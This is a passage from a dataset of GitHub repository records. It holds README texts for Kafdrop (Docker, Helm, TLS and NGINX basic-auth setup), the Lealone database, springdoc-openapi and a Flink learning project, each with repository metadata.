* `kafka.truststore.jks`: specifying the certificate for authenticating brokers, if TLS is enabled.
* `kafka.keystore.jks`: specifying the private key to authenticate the client to the broker, if mutual TLS authentication is required.
* `kafka.properties`: specifying the necessary configuration, including key/truststore passwords, cipher suites, enabled TLS protocol versions, username/password pairs, etc. When supplying the truststore and/or keystore files, the `ssl.truststore.location` and `ssl.keystore.location` properties will be assigned automatically.
### Using Docker
The three files above can be supplied to a Docker instance in base-64-encoded form via environment variables:
```sh
docker run -d --rm -p 9000:9000 \
-e KAFKA_BROKERCONNECT= \
-e KAFKA_PROPERTIES=""$(cat kafka.properties | base64)"" \
-e KAFKA_TRUSTSTORE=""$(cat kafka.truststore.jks | base64)"" \ # optional
-e KAFKA_KEYSTORE=""$(cat kafka.keystore.jks | base64)"" \ # optional
obsidiandynamics/kafdrop
```
Rather than passing `KAFKA_PROPERTIES` as a base64-encoded string, you can also place a pre-populated `KAFKA_PROPERTIES_FILE` into the container:
```sh
cat << EOF > kafka.properties
security.protocol=SASL_SSL
sasl.mechanism=SCRAM-SHA-512
sasl.jaas.config=org.apache.kafka.common.security.scram.ScramLoginModule required username=""foo"" password=""bar""
EOF
docker run -d --rm -p 9000:9000 \
-v $(pwd)/kafka.properties:/tmp/kafka.properties:ro \
-v $(pwd)/kafka.truststore.jks:/tmp/kafka.truststore.jks:ro \
-v $(pwd)/kafka.keystore.jks:/tmp/kafka.keystore.jks:ro \
-e KAFKA_BROKERCONNECT= \
-e KAFKA_PROPERTIES_FILE=/tmp/kafka.properties \
-e KAFKA_TRUSTSTORE_FILE=/tmp/kafka.truststore.jks \ # optional
-e KAFKA_KEYSTORE_FILE=/tmp/kafka.keystore.jks \ # optional
obsidiandynamics/kafdrop
```
#### Environment Variables
##### Basic configuration
|Name |Description
|----------------------------|-------------------------------
|`KAFKA_BROKERCONNECT` |Bootstrap list of Kafka host/port pairs. Defaults to `localhost:9092`.
|`KAFKA_PROPERTIES` |Additional properties to configure the broker connection (base-64 encoded).
|`KAFKA_TRUSTSTORE` |Certificate for broker authentication (base-64 encoded). Required for TLS/SSL.
|`KAFKA_KEYSTORE` |Private key for mutual TLS authentication (base-64 encoded).
|`SERVER_SERVLET_CONTEXTPATH`|The context path to serve requests on (must end with a `/`). Defaults to `/`.
|`SERVER_PORT` |The web server port to listen on. Defaults to `9000`.
|`MANAGEMENT_SERVER_PORT` |The Spring Actuator server port to listen on. Defaults to `9000`.
|`SCHEMAREGISTRY_CONNECT ` |The endpoint of Schema Registry for Avro or Protobuf message
|`SCHEMAREGISTRY_AUTH` |Optional basic auth credentials in the form `username:password`.
|`CMD_ARGS` |Command line arguments to Kafdrop, e.g. `--message.format` or `--protobufdesc.directory` or `--server.port`.
##### Advanced configuration
| Name |Description
|--------------------------|-------------------------------
| `JVM_OPTS` |JVM options. E.g.```JVM_OPTS: ""-Xms16M -Xmx64M -Xss360K -XX:-TieredCompilation -XX:+UseStringDeduplication -noverify""```
| `JMX_PORT` |Port to use for JMX. No default; if unspecified, JMX will not be exposed.
| `HOST` |The hostname to report for the RMI registry (used for JMX). Defaults to `localhost`.
| `KAFKA_PROPERTIES_FILE` |Internal location where the Kafka properties file will be written to (if `KAFKA_PROPERTIES` is set). Defaults to `kafka.properties`.
| `KAFKA_TRUSTSTORE_FILE` |Internal location where the truststore file will be written to (if `KAFKA_TRUSTSTORE` is set). Defaults to `kafka.truststore.jks`.
| `KAFKA_KEYSTORE_FILE` |Internal location where the keystore file will be written to (if `KAFKA_KEYSTORE` is set). Defaults to `kafka.keystore.jks`.
| `SSL_ENABLED` | Enabling HTTPS (SSL) for Kafdrop server. Default is `false`
| `SSL_KEY_STORE_TYPE` | Type of SSL keystore. Default is `PKCS12`
| `SSL_KEY_STORE` | Path to keystore file
| `SSL_KEY_STORE_PASSWORD` | Keystore password
| `SSL_KEY_ALIAS` | Key alias
### Using Helm
Like in the Docker example, supply the files in base-64 form:
```sh
helm upgrade -i kafdrop chart --set image.tag=3.x.x \
--set kafka.brokerConnect= \
--set kafka.properties=""$(cat kafka.properties | base64)"" \
--set kafka.truststore=""$(cat kafka.truststore.jks | base64)"" \
--set kafka.keystore=""$(cat kafka.keystore.jks | base64)""
```
## Updating the Bootstrap theme
Edit the `.scss` files in the `theme` directory, then run `theme/install.sh`. This will overwrite `src/main/resources/static/css/bootstrap.min.css`. Then build as usual. (Requires `npm`.)
## Securing the Kafdrop UI
Kafdrop doesn't (yet) natively implement an authentication mechanism to restrict user access. Here's a quick workaround using NGINX using Basic Auth. The instructions below are for macOS and Homebrew.
### Requirements
* NGINX: install using `which nginx > /dev/null || brew install nginx`
* Apache HTTP utilities: `which htpasswd > /dev/null || brew install httpd`
### Setup
Set the admin password (you will be prompted):
```sh
htpasswd -c /usr/local/etc/nginx/.htpasswd admin
```
Add a logout page in `/usr/local/opt/nginx/html/401.html`:
```html
```
Use the following snippet for `/usr/local/etc/nginx/nginx.conf`:
```
worker_processes 4;
events {
worker_connections 1024;
}
http {
upstream kafdrop {
server 127.0.0.1:9000;
keepalive 64;
}
server {
listen *:8080;
server_name _;
access_log /usr/local/var/log/nginx/nginx.access.log;
error_log /usr/local/var/log/nginx/nginx.error.log;
auth_basic ""Restricted Area"";
auth_basic_user_file /usr/local/etc/nginx/.htpasswd;
location / {
proxy_pass http://kafdrop;
}
location /logout {
return 401;
}
error_page 401 /errors/401.html;
location /errors {
auth_basic off;
ssi on;
alias /usr/local/opt/nginx/html;
}
}
}
```
Run NGINX:
```sh
nginx
```
Or reload its configuration if already running:
```sh
nginx -s reload
```
To logout, browse to [/logout](http://localhost:8080/logout).
> **Hey there!** We hope you really like Kafdrop! Please take a moment to [⭐](https://github.com/obsidiandynamics/kafdrop)the repo or [Tweet](https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Fobsidiandynamics%2Fkafdrop&text=Get%20Kafdrop%20%E2%80%94%20a%20web-based%20UI%20for%20viewing%20%23ApacheKafka%20topics%20and%20browsing%20consumers%20) about it.
# Contributing Guidelines
See [here](CONTRIBUTING.md).
## Release workflow
To cut an official release, these are the steps:
1. Commit a new version on master that has the `-SNAPSHOT` suffix stripped (see `pom.xml`). Once the commit is merged, the CI will treat it as a release build, and will end up publishing more artifacts than the regular (non-release/snapshot) build. One of those will be a dockerhub push to the specific version and ""latest"" tags. (The regular build doesn't update ""latest"").
2. You can then edit the release description in GitHub to describe what went into the release.
3. After the release goes through successfully, you need to prepare the repo for the next version, which requires committing the next snapshot version on master again. So we should increment the minor version and add again the `-SNAPSHOT` suffix.
"
lealone/Lealone,master,2412,516,2013-01-08T13:57:08Z,28140,18,比 MySQL 和 MongoDB 快10倍的 OLTP 关系数据库和文档数据库,acid async database lealone microservice newsql oltp orm rdbms replication sharding sql,"
### Lealone 是什么
* 是一个高性能的面向 OLTP 场景的关系数据库
* 也是一个兼容 MongoDB 的高性能文档数据库
* 同时还高度兼容 MySQL 和 PostgreSQL 的协议和 SQL 语法
### Lealone 有哪些特性
##### 高亮特性
* 并发写性能极其炸裂
* 全链路异步化,使用少量线程就能处理大量并发
* 可暂停的、渐进式的 SQL 引擎
* 基于 SQL 优先级的抢占式调度,慢查询不会长期霸占 CPU
* 创建 JDBC 连接非常快速,占用资源少,不再需要 JDBC 连接池
* 插件化存储引擎架构,内置 AOSE 引擎,采用新颖的异步化 B-Tree
* 插件化事务引擎架构,事务处理逻辑与存储分离,内置 AOTE 引擎
* 支持 Page 级别的行列混合存储,对于有很多字段的表,只读少量字段时能大量节约内存
* 支持通过 CREATE SERVICE 语句创建可托管的后端服务
* 只需要一个不到 2M 的 jar 包就能运行,不需要安装
##### 普通特性
* 支持索引、视图、Join、子查询、触发器、自定义函数、Order By、Group By、聚合
##### 云服务版
* 支持高性能分布式事务、支持强一致性复制、支持全局快照隔离
* 支持自动化分片 (Sharding),用户不需要关心任何分片的规则,没有热点,能够进行范围查询
* 支持混合运行模式,包括4种模式: 嵌入式、Client/Server 模式、复制模式、Sharding 模式
* 支持不停机快速手动或自动转换运行模式: Client/Server 模式 -> 复制模式 -> Sharding 模式
### Lealone 文档
* [快速入门](https://github.com/lealone/Lealone-Docs/blob/master/应用文档/Lealone数据库快速入门.md)
* [文档首页](https://github.com/lealone/Lealone-Docs)
### Lealone 插件
* 兼容 MongoDB、MySQL、PostgreSQL 的插件
* [插件首页](https://github.com/lealone-plugins)
### Lealone 微服务框架
* 非常新颖的基于数据库技术实现的微服务框架,开发分布式微服务应用跟开发单体应用一样简单
* [微服务框架文档](https://github.com/lealone/Lealone-Docs/blob/master/%E5%BA%94%E7%94%A8%E6%96%87%E6%A1%A3/%E5%BE%AE%E6%9C%8D%E5%8A%A1%E5%92%8CORM%E6%A1%86%E6%9E%B6%E6%96%87%E6%A1%A3.md#lealone-%E5%BE%AE%E6%9C%8D%E5%8A%A1%E6%A1%86%E6%9E%B6)
### Lealone ORM 框架
* 超简洁的类型安全的 ORM 框架,不需要配置文件和注解
* [ORM 框架文档](https://github.com/lealone/Lealone-Docs/blob/master/%E5%BA%94%E7%94%A8%E6%96%87%E6%A1%A3/%E5%BE%AE%E6%9C%8D%E5%8A%A1%E5%92%8CORM%E6%A1%86%E6%9E%B6%E6%96%87%E6%A1%A3.md#lealone-orm-%E6%A1%86%E6%9E%B6)
### Lealone 名字的由来
* Lealone 发音 ['li:ləʊn] 这是我新造的英文单词,
灵感来自于办公桌上那些叫绿萝的室内植物,一直想做个项目以它命名。
绿萝的拼音是 lv luo,与 Lealone 英文发音有点相同,
Lealone 是 lea + lone 的组合,反过来念更有意思哦。:)
### Lealone 历史
* 2012年从 [H2 数据库 ](http://www.h2database.com/html/main.html)的代码开始
* [Lealone 的过去现在将来](https://github.com/codefollower/My-Blog/issues/16)
### [Lealone License](https://github.com/lealone/Lealone/blob/master/LICENSE.md)
"
springdoc/springdoc-openapi,main,3084,462,2019-07-11T23:08:20Z,8721,15,Library for OpenAPI 3 with spring-boot,java json-format kotlin oauth2 openapi openapi-spec openapi-specification openapi3 rest-api spring spring-boot spring-data-rest spring-hateoas spring-security spring-webflux springdoc-openapi swagger swagger-documentation swagger-ui yaml-format,"![Octocat](https://springdoc.org/img/banner-logo.svg)
[![Build Status](https://ci-cd.springdoc.org:8443/buildStatus/icon?job=springdoc-openapi-starter-IC)](https://ci-cd.springdoc.org:8443/view/springdoc-openapi/job/springdoc-openapi-starter-IC/)
[![Quality Gate](https://sonarcloud.io/api/project_badges/measure?project=springdoc_springdoc-openapi&metric=alert_status)](https://sonarcloud.io/dashboard?id=springdoc_springdoc-openapi)
[![Known Vulnerabilities](https://snyk.io/test/github/springdoc/springdoc-openapi.git/badge.svg)](https://snyk.io/test/github/springdoc/springdoc-openapi.git)
[![Stack Exchange questions](https://img.shields.io/stackexchange/stackoverflow/t/springdoc)](https://stackoverflow.com/questions/tagged/springdoc?tab=Votes)
IMPORTANT: ``springdoc-openapi v1.8.0`` is the latest Open Source release supporting Spring Boot 2.x and 1.x.
An extended support for [*springdoc-openapi v1*](https://springdoc.org/v1)
project is now available for organizations that need support beyond 2023.
For more details, feel free to reach out: [sales@springdoc.org](mailto:sales@springdoc.org)
``springdoc-openapi`` is on [Open Collective](https://opencollective.com/springdoc). If you ❤️ this project consider becoming
a [sponsor](https://github.com/sponsors/springdoc).
This project is sponsored by
# Table of Contents
- [Full documentation](#full-documentation)
- [**Introduction**](#introduction)
- [**Getting Started**](#getting-started)
- [Library for springdoc-openapi integration with spring-boot and swagger-ui](#library-for-springdoc-openapi-integration-with-spring-boot-and-swagger-ui)
- [Spring-boot with OpenAPI Demo applications.](#spring-boot-with-openapi-demo-applications)
- [Source Code for Demo Applications.](#source-code-for-demo-applications)
- [Demo Spring Boot 2 Web MVC with OpenAPI 3.](#demo-spring-boot-2-web-mvc-with-openapi-3)
- [Demo Spring Boot 2 WebFlux with OpenAPI 3.](#demo-spring-boot-2-webflux-with-openapi-3)
- [Demo Spring Boot 2 WebFlux with Functional endpoints OpenAPI 3.](#demo-spring-boot-2-webflux-with-functional-endpoints-openapi-3)
- [Demo Spring Boot 2 and Spring Hateoas with OpenAPI 3.](#demo-spring-boot-2-and-spring-hateoas-with-openapi-3)
- [Integration of the library in a Spring Boot 3.x project without the swagger-ui:](#integration-of-the-library-in-a-spring-boot-3x-project-without-the-swagger-ui)
- [Error Handling for REST using @ControllerAdvice](#error-handling-for-rest-using-controlleradvice)
- [Adding API Information and Security documentation](#adding-api-information-and-security-documentation)
- [spring-webflux support with Annotated Controllers](#spring-webflux-support-with-annotated-controllers)
- [Acknowledgements](#acknowledgements)
- [Contributors](#contributors)
- [Additional Support](#additional-support)
# [Full documentation](https://springdoc.org/)
# **Introduction**
The springdoc-openapi Java library helps automating the generation of API documentation
using Spring Boot projects.
springdoc-openapi works by examining an application at runtime to infer API semantics
based on Spring configurations, class structure and various annotations.
The library automatically generates documentation in JSON/YAML and HTML formatted pages.
The generated documentation can be complemented using `swagger-api` annotations.
This library supports:
* OpenAPI 3
* Spring-boot v3 (Java 17 & Jakarta EE 9)
* JSR-303, specifically for @NotNull, @Min, @Max, and @Size.
* Swagger-ui
* OAuth 2
* GraalVM native images
The following video introduces the Library:
* [https://youtu.be/utRxyPfFlDw](https://youtu.be/utRxyPfFlDw)
For *spring-boot v3* support, make sure you use [springdoc-openapi v2](https://springdoc.org/)
This is a community-based project, not maintained by the Spring Framework Contributors (Pivotal)
# **Getting Started**
## Library for springdoc-openapi integration with spring-boot and swagger-ui
* Automatically deploys swagger-ui to a Spring Boot 3.x application
* Documentation will be available in HTML format, using the
official [swagger-ui jars](https://github.com/swagger-api/swagger-ui.git).
* The Swagger UI page should then be available at http://server:
port/context-path/swagger-ui.html and the OpenAPI description will be available at the
following url for json format: http://server:port/context-path/v3/api-docs
* `server`: The server name or IP
* `port`: The server port
* `context-path`: The context path of the application
* Documentation can be available in yaml format as well, on the following path:
`/v3/api-docs.yaml`
* Add the `springdoc-openapi-ui` library to the list of your project dependencies (No
additional configuration is needed):
```xml
org.springdocspringdoc-openapi-starter-webmvc-uilast-release-version
```
* This step is optional: For custom path of the swagger documentation in HTML format, add
a custom springdoc property, in your spring-boot configuration file:
```properties
# swagger-ui custom path
springdoc.swagger-ui.path=/swagger-ui.html
```
## Spring-boot with OpenAPI Demo applications.
### [Source Code for Demo Applications](https://github.com/springdoc/springdoc-openapi-demos/tree/master).
## [Demo Spring Boot 3 Web MVC with OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webmvc).
## [Demo Spring Boot 3 WebFlux with OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webflux/swagger-ui.html).
## [Demo Spring Boot 3 WebFlux with Functional endpoints OpenAPI 3](https://demos.springdoc.org/demo-spring-boot-3-webflux-functional/swagger-ui.html).
## [Demo Spring Boot 3 and Spring Cloud Function Web MVC](https://demos.springdoc.org/spring-cloud-function-webmvc).
## [Demo Spring Boot 3 and Spring Cloud Function WebFlux](http://158.101.191.70:8085/swagger-ui.html).
## [Demo Spring Boot 3 and Spring Cloud Gateway](https://demos.springdoc.org/demo-microservices/swagger-ui.html).
![Branching](https://springdoc.org/img/pets.png)
## Integration of the library in a Spring Boot 3.x project without the swagger-ui:
* Documentation will be available at the following url for json format: http://server:
port/context-path/v3/api-docs
* `server`: The server name or IP
* `port`: The server port
* `context-path`: The context path of the application
* Documentation will be available in yaml format as well, on the following
path : `/v3/api-docs.yaml`
* Add the library to the list of your project dependencies. (No additional configuration
is needed)
```xml
org.springdocspringdoc-openapi-starter-webmvc-apilast-release-version
```
* This step is optional: For custom path of the OpenAPI documentation in Json format, add
a custom springdoc property, in your spring-boot configuration file:
```properties
# /api-docs endpoint custom path
springdoc.api-docs.path=/api-docs
```
* This step is optional: If you want to disable `springdoc-openapi` endpoints, add a
custom springdoc property, in your `spring-boot` configuration file:
```properties
# disable api-docs
springdoc.api-docs.enabled=false
```
## Error Handling for REST using @ControllerAdvice
To generate documentation automatically, make sure all the methods declare the HTTP Code
responses using the annotation: @ResponseStatus.
## Adding API Information and Security documentation
The library uses spring-boot application auto-configured packages to scan for the
following annotations in spring beans: OpenAPIDefinition and Info.
These annotations declare, API Information: Title, version, licence, security, servers,
tags, security and externalDocs.
For better performance of documentation generation, declare `@OpenAPIDefinition`
and `@SecurityScheme` annotations within a Spring managed bean.
## spring-webflux support with Annotated Controllers
* Documentation can be available in yaml format as well, on the following path :
/v3/api-docs.yaml
* Add the library to the list of your project dependencies (No additional configuration
is needed)
```xml
org.springdocspringdoc-openapi-starter-webflux-uilast-release-version
```
* This step is optional: For custom path of the swagger documentation in HTML format, add
a custom springdoc property, in your spring-boot configuration file:
```properties
# swagger-ui custom path
springdoc.swagger-ui.path=/swagger-ui.html
```
The `springdoc-openapi` libraries are hosted on maven central repository.
The artifacts can be viewed accessed at the following locations:
Releases:
* [https://s01.oss.sonatype.org/content/groups/public/org/springdoc/](https://s01.oss.sonatype.org/content/groups/public/org/springdoc/)
.
Snapshots:
* [https://s01.oss.sonatype.org/content/repositories/snapshots/org/springdoc/](https://s01.oss.sonatype.org/content/repositories/snapshots/org/springdoc/)
.
# Acknowledgements
## Contributors
springdoc-openapi is relevant and updated regularly due to the valuable contributions from
its [contributors](https://github.com/springdoc/springdoc-openapi/graphs/contributors).
Thanks you all for your support!
## Additional Support
* [Spring Team](https://spring.io/team) - Thanks for their support by sharing all relevant
resources around Spring projects.
* [JetBrains](https://www.jetbrains.com/?from=springdoc-openapi) - Thanks a lot for
supporting springdoc-openapi project.
![JenBrains logo](https://springdoc.org/img/jetbrains.svg)
"
zhisheng17/flink-learning,master,14247,3854,2019-01-01T07:38:28Z,43599,0,flink learning blog. http://www.54tianzhisheng.cn/ 含 Flink 入门、概念、原理、实战、性能调优、源码解析等内容。涉及 Flink Connector、Metrics、Library、DataStream API、Table API & SQL 等内容的学习案例,还有 Flink 落地应用的大型项目案例(PVUV、日志存储、百亿数据实时去重、监控告警)分享。欢迎大家支持我的专栏《大数据实时计算引擎 Flink 实战与性能优化》,clickhouse elasticsearch flink hbase influxdb kafka loki mysql opentsdb rabbitmq redis rocketmq spark stream-processing streaming,"# Flink 学习
麻烦路过的各位亲给这个项目点个 star,太不易了,写了这么多,算是对我坚持下来的一种鼓励吧!另外特别感谢 [JetBrains](https://jb.gg/OpenSourceSupport) 公司提供的免费全家桶工具,🙏🙏🙏!
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-05-25-124027.jpg)
## Stargazers over time
![Stargazers over time](https://starchart.cc/zhisheng17/flink-learning.svg)
## 本项目结构
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/2020-01-11-064410.png)
## How to build
Maybe your Maven conf file `settings.xml` mirrors can add aliyun central mirror :
```xml
alimavencentralaliyun mavenhttps://maven.aliyun.com/repository/central
```
then you can run the following command :
```
mvn clean package -Dmaven.test.skip=true
```
you can see following result if build success.
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-09-27-121923.jpg)
## Flink 系统专栏
基于 Flink 1.9 讲解的专栏,涉及入门、概念、原理、实战、性能调优、系统案例的讲解。扫码下面专栏二维码可以订阅该专栏
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-11-05-044731.jpg)
首发地址:[http://www.54tianzhisheng.cn/2019/11/15/flink-in-action/](http://www.54tianzhisheng.cn/2019/11/15/flink-in-action/)
专栏地址:[https://gitbook.cn/gitchat/column/5dad4a20669f843a1a37cb4f](https://gitbook.cn/gitchat/column/5dad4a20669f843a1a37cb4f)
## Change
**2022/02/26** 将自己 《Flink 实战与性能优化》专栏放在 GitHub,参见 books 目录
**2021/12/18** 将该项目的 Flink 版本升级至 1.14.2,如果有需要可以去老的分支查看。
**2021/08/15** 将该项目的 Flink 版本升级至 1.13.2,API 发生重大改变,所以代码结构也做了相应的调整(部分代码在 master 分支已经删除,同时将之前的代码切到 [feature/flink-1.10.0](https://github.com/zhisheng17/flink-learning/tree/feature/flink-1.10.0) 上了,如果有需要可以去老的分支查看)。
**2020/02/16** 将该项目的 Flink 版本升级至 1.10,该版本代码都是经过测试成功运行的,尽量以该版本作为参考,如果代码在你们集群测试不成功,麻烦检查 Flink 版本是否一致,或者是否有包冲突问题。
**2019/09/06** 将该项目的 Flink 版本升级到 1.9.0,有一些变动,Flink 1.8.0 版本的代码经群里讨论保存在分支 [feature/flink-1.8.0](https://github.com/zhisheng17/flink-learning/tree/feature/flink-1.8.0) 以便部分同学需要。
**2019/06/08** 四本 Flink 书籍:
+ [Introduction_to_Apache_Flink_book.pdf]() 这本书比较薄,处于介绍阶段,国内有这本的翻译书籍
+ [Learning Apache Flink.pdf]() 这本书比较基础,初学的话可以多看看
+ [Stream Processing with Apache Flink.pdf]() 这本书是 Flink PMC 写的
+ [Streaming System.pdf]() 这本书评价不是一般的高
**2019/06/09** 新增流处理引擎相关的 Paper,在 paper 目录下:
+ [流处理引擎相关的 Paper](./paper/paper.md)
**【提示】**:关于书籍的下载,因版权问题,不方便提供,所以已经删除,需要的话可以切换到老分支去下载。
## 博客
1、[Flink 从0到1学习 —— Apache Flink 介绍](http://www.54tianzhisheng.cn/2018/10/13/flink-introduction/)
2、[Flink 从0到1学习 —— Mac 上搭建 Flink 1.6.0 环境并构建运行简单程序入门](http://www.54tianzhisheng.cn/2018/09/18/flink-install)
3、[Flink 从0到1学习 —— Flink 配置文件详解](http://www.54tianzhisheng.cn/2018/10/27/flink-config/)
4、[Flink 从0到1学习 —— Data Source 介绍](http://www.54tianzhisheng.cn/2018/10/28/flink-sources/)
5、[Flink 从0到1学习 —— 如何自定义 Data Source ?](http://www.54tianzhisheng.cn/2018/10/30/flink-create-source/)
6、[Flink 从0到1学习 —— Data Sink 介绍](http://www.54tianzhisheng.cn/2018/10/29/flink-sink/)
7、[Flink 从0到1学习 —— 如何自定义 Data Sink ?](http://www.54tianzhisheng.cn/2018/10/31/flink-create-sink/)
8、[Flink 从0到1学习 —— Flink Data transformation(转换)](http://www.54tianzhisheng.cn/2018/11/04/Flink-Data-transformation/)
9、[Flink 从0到1学习 —— 介绍 Flink 中的 Stream Windows](http://www.54tianzhisheng.cn/2018/12/08/Flink-Stream-Windows/)
10、[Flink 从0到1学习 —— Flink 中的几种 Time 详解](http://www.54tianzhisheng.cn/2018/12/11/Flink-time/)
11、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 ElasticSearch](http://www.54tianzhisheng.cn/2018/12/30/Flink-ElasticSearch-Sink/)
12、[Flink 从0到1学习 —— Flink 项目如何运行?](http://www.54tianzhisheng.cn/2019/01/05/Flink-run/)
13、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Kafka](http://www.54tianzhisheng.cn/2019/01/06/Flink-Kafka-sink/)
14、[Flink 从0到1学习 —— Flink JobManager 高可用性配置](http://www.54tianzhisheng.cn/2019/01/13/Flink-JobManager-High-availability/)
15、[Flink 从0到1学习 —— Flink parallelism 和 Slot 介绍](http://www.54tianzhisheng.cn/2019/01/14/Flink-parallelism-slot/)
16、[Flink 从0到1学习 —— Flink 读取 Kafka 数据批量写入到 MySQL](http://www.54tianzhisheng.cn/2019/01/15/Flink-MySQL-sink/)
17、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 RabbitMQ](https://t.zsxq.com/uVbi2nq)
18、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 HBase](https://t.zsxq.com/zV7MnuJ)
19、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 HDFS](https://t.zsxq.com/zV7MnuJ)
20、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Redis](https://t.zsxq.com/zV7MnuJ)
21、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Cassandra](https://t.zsxq.com/uVbi2nq)
22、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Flume](https://t.zsxq.com/zV7MnuJ)
23、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 InfluxDB](https://t.zsxq.com/zV7MnuJ)
24、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 RocketMQ](https://t.zsxq.com/zV7MnuJ)
25、[Flink 从0到1学习 —— 你上传的 jar 包藏到哪里去了](https://t.zsxq.com/uniY7mm)
26、[Flink 从0到1学习 —— 你的 Flink job 日志跑到哪里去了](https://t.zsxq.com/zV7MnuJ)
### Flink 源码项目结构
![](./pics/Flink-code.png)
## 学习资料
另外我自己整理了些 Flink 的学习资料,目前已经全部放到微信公众号了。
你可以加我的微信:**yuanblog_tzs**,然后回复关键字:**Flink** 即可无条件获取到,转载请联系本人获取授权,违者必究。
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-09-17-143454.jpg)
更多私密资料请加入知识星球!
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-23-124320.jpg)
有人要问知识星球里面更新什么内容?值得加入吗?
目前知识星球内已更新的系列文章:
### 大数据重磅炸弹
1、[《大数据重磅炸弹——实时计算引擎 Flink》开篇词](https://t.zsxq.com/fqfuVRR)
2、[你公司到底需不需要引入实时计算引擎?](https://t.zsxq.com/emMBaQN)
3、[一文让你彻底了解大数据实时计算框架 Flink](https://t.zsxq.com/eM3ZRf2)
4、[别再傻傻的分不清大数据框架Flink、Blink、Spark Streaming、Structured Streaming和Storm之间的区别了](https://t.zsxq.com/eAyRz7Y)
5、[Flink 环境准备看这一篇就够了](https://t.zsxq.com/iaMJAe6)
6、[一文讲解从 Flink 环境安装到源码编译运行](https://t.zsxq.com/iaMJAe6)
7、[通过 WordCount 程序教你快速入门上手 Flink](https://t.zsxq.com/eaIIiAm)
8、[Flink 如何处理 Socket 数据及分析实现过程](https://t.zsxq.com/Vnq72jY)
9、[Flink job 如何在 Standalone、YARN、Mesos、K8S 上部署运行?](https://t.zsxq.com/BiyvFUZ)
10、[Flink 数据转换必须熟悉的算子(Operator)](https://t.zsxq.com/fufUBiA)
11、[Flink 中 Processing Time、Event Time、Ingestion Time 对比及其使用场景分析](https://t.zsxq.com/r7aYB2V)
12、[如何使用 Flink Window 及 Window 基本概念与实现原理](https://t.zsxq.com/byZbyrb)
13、[如何使用 DataStream API 来处理数据?](https://t.zsxq.com/VzNBi2r)
14、[Flink WaterMark 详解及结合 WaterMark 处理延迟数据](https://t.zsxq.com/Iub6IQf)
15、[基于 Apache Flink 的监控告警系统](https://t.zsxq.com/MniUnqb)
16、[数据仓库、数据库的对比介绍与实时数仓案例分享](https://t.zsxq.com/v7QzNZ3)
17、[使用 Prometheus Grafana 监控 Flink](https://t.zsxq.com/uRN3VfA)
### 源码系列
1、[Flink 源码解析 —— 源码编译运行](https://t.zsxq.com/UZfaYfE)
2、[Flink 源码解析 —— 项目结构一览](https://t.zsxq.com/zZZjaYf)
3、[Flink 源码解析—— local 模式启动流程](https://t.zsxq.com/zV7MnuJ)
4、[Flink 源码解析 —— standalonesession 模式启动流程](https://t.zsxq.com/QZVRZJA)
5、[Flink 源码解析 —— Standalone Session Cluster 启动流程深度分析之 Job Manager 启动](https://t.zsxq.com/u3fayvf)
6、[Flink 源码解析 —— Standalone Session Cluster 启动流程深度分析之 Task Manager 启动](https://t.zsxq.com/MnQRByb)
7、[Flink 源码解析 —— 分析 Batch WordCount 程序的执行过程](https://t.zsxq.com/YJ2Zrfi)
8、[Flink 源码解析 —— 分析 Streaming WordCount 程序的执行过程](https://t.zsxq.com/qnMFEUJ)
9、[Flink 源码解析 —— 如何获取 JobGraph?](https://t.zsxq.com/naaMf6y)
10、[Flink 源码解析 —— 如何获取 StreamGraph?](https://t.zsxq.com/qRFIm6I)
11、[Flink 源码解析 —— Flink JobManager 有什么作用?](https://t.zsxq.com/2VRrbuf)
12、[Flink 源码解析 —— Flink TaskManager 有什么作用?](https://t.zsxq.com/RZbu7yN)
13、[Flink 源码解析 —— JobManager 处理 SubmitJob 的过程](https://t.zsxq.com/zV7MnuJ)
14、[Flink 源码解析 —— TaskManager 处理 SubmitJob 的过程](https://t.zsxq.com/zV7MnuJ)
15、[Flink 源码解析 —— 深度解析 Flink Checkpoint 机制](https://t.zsxq.com/ynQNbeM)
16、[Flink 源码解析 —— 深度解析 Flink 序列化机制](https://t.zsxq.com/JaQfeMf)
17、[Flink 源码解析 —— 深度解析 Flink 是如何管理好内存的?](https://t.zsxq.com/zjQvjeM)
18、[Flink Metrics 源码解析 —— Flink-metrics-core](https://t.zsxq.com/Mnm2nI6)
19、[Flink Metrics 源码解析 —— Flink-metrics-datadog](https://t.zsxq.com/Mnm2nI6)
20、[Flink Metrics 源码解析 —— Flink-metrics-dropwizard](https://t.zsxq.com/Mnm2nI6)
21、[Flink Metrics 源码解析 —— Flink-metrics-graphite](https://t.zsxq.com/Mnm2nI6)
22、[Flink Metrics 源码解析 —— Flink-metrics-influxdb](https://t.zsxq.com/Mnm2nI6)
23、[Flink Metrics 源码解析 —— Flink-metrics-jmx](https://t.zsxq.com/Mnm2nI6)
24、[Flink Metrics 源码解析 —— Flink-metrics-slf4j](https://t.zsxq.com/Mnm2nI6)
25、[Flink Metrics 源码解析 —— Flink-metrics-statsd](https://t.zsxq.com/Mnm2nI6)
26、[Flink Metrics 源码解析 —— Flink-metrics-prometheus](https://t.zsxq.com/Mnm2nI6)
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-26-150037.jpg)
26、[Flink Annotations 源码解析](https://t.zsxq.com/f6eAu3J)
![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-26-145923.jpg)
除了《从1到100深入学习Flink》源码学习这个系列文章,《从0到1学习Flink》的案例文章也会优先在知识星球更新,让大家先通过一些 demo 学习 Flink,再去深入源码学习!
